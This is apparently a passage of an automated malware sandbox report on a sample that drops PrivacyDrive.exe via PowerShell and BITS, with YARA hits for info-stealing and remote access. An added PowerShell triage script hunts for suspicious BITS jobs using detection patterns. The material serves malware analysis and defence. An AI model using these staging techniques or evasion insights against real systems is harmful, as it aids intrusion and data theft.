Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00414200 GetLocalTime, 4_2_00414200
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00476750 LookupAccountNameW,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority, 4_2_00476750
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004A83C0 _memset,_memset,GetVersionExW, 4_2_004A83C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe
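The svchost.exe entries above are the BITS service host touching its job queue database under C:\ProgramData\Microsoft\Network\Downloader (qmgr.db plus the ESE transaction files edb.log, edb.chk and qmgr.jfm); BITS writes there whenever a transfer job is created or updated, which is consistent with the "Powershell uses Background Intelligent Transfer Service (BITS)" signature and with the dropped PrivacyDrive.exe under AppData\Roaming. The triage script below is an added example for a host suspected of the same download staging; it is not part of the sandbox report. It assumes an elevated PowerShell session (Get-BitsTransfer -AllUsers and the operational log need it), that the Microsoft-Windows-Bits-Client/Operational log is enabled (the default), and that event IDs 3, 4, 59, 60 and 61 are the job-created, job-complete and per-URL transfer start/stop/error events; the URL and local-path patterns are constructed for the example and should be tuned to the environment.

```powershell
# Added triage example for BITS-based staging (not part of the sandbox report).
# Assumes an elevated PowerShell session on the host being examined.

$downloader = 'C:\ProgramData\Microsoft\Network\Downloader'

function Get-BitsArtifactSummary {
    # The queue database and its ESE transaction files. svchost.exe (BITS) touches
    # these whenever a job is created or updated, which is the access pattern the
    # sandbox recorded. Timestamps alone prove nothing: Windows Update and Defender
    # signature updates use BITS constantly, so the job contents matter, not the files.
    Get-ChildItem -Path $downloader -Force -ErrorAction SilentlyContinue |
        Select-Object Name, Length, LastWriteTime
}

function Get-SuspiciousBitsJob {
    param(
        # Remote-side patterns that are not normal for Windows/Defender/Store traffic.
        # Constructed for the example; tune to the environment.
        [string[]] $UrlPattern = @('^http://', '\.php', '\.txt$', '\.exe$', '\d+\.\d+\.\d+\.\d+'),
        # Local drop locations in the style of the report's AppData\Roaming\<random>\*.exe.
        [string] $LocalPattern = 'AppData\\Roaming|AppData\\Local\\Temp|ProgramData\\[^\\]+\\[^\\]+\.exe$'
    )
    # -AllUsers needs admin; jobs owned by other accounts are otherwise invisible.
    Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue | ForEach-Object {
        $job = $_
        foreach ($f in $job.FileList) {
            $urlHit   = $UrlPattern | Where-Object { $f.RemoteName -match $_ }
            $localHit = $f.LocalName -match $LocalPattern
            if (-not ($urlHit -or $localHit)) { continue }
            if ($urlHit) { $reason = "url:$($urlHit -join ',')" } else { $reason = 'local-path' }
            [pscustomobject]@{
                JobId      = $job.JobId
                Owner      = $job.OwnerAccount
                State      = $job.JobState
                Created    = $job.CreationTime
                RemoteName = $f.RemoteName
                LocalName  = $f.LocalName
                Reason     = $reason
            }
        }
    }
}

function Get-BitsClientHistory {
    param([int] $Hours = 24)
    # The live queue only shows jobs still queued; completed or cancelled jobs
    # (the usual state once the payload has landed) survive only in the event log.
    $filter = @{
        LogName   = 'Microsoft-Windows-Bits-Client/Operational'
        Id        = 3, 4, 59, 60, 61   # job created / complete / transfer start / stop / error (assumed IDs, verify on your build)
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { ($_.Message -split "`r?`n")[0] } }
}

Get-BitsArtifactSummary | Format-Table -AutoSize
Get-SuspiciousBitsJob   | Format-Table -AutoSize
Get-BitsClientHistory   | Format-Table -AutoSize -Wrap
```

The job owner (OwnerAccount), the remote URL and the local file name are the pivot points: match them against the PowerShell download cradle and the dropped PrivacyDrive.exe path from the process tree, and carry the URL into network telemetry. If the queue is already empty, the event log history is the only host-side record of the transfer short of carving qmgr.db itself.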

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0040D05C RpcBindingFree,LeaveCriticalSection, 4_2_0040D05C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0040D0B0 WaitForSingleObject,WaitForSingleObject,EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,CloseHandle, 4_2_0040D0B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0040CDF0 EnterCriticalSection,RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,RpcEpResolveBinding,RpcStringFreeW,RpcBindingFree,RpcStringFreeW,LeaveCriticalSection, 4_2_0040CDF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0040CEEC RpcBindingFree,RpcStringFreeW,LeaveCriticalSection, 4_2_0040CEEC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0040CF40 EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent, 4_2_0040CF40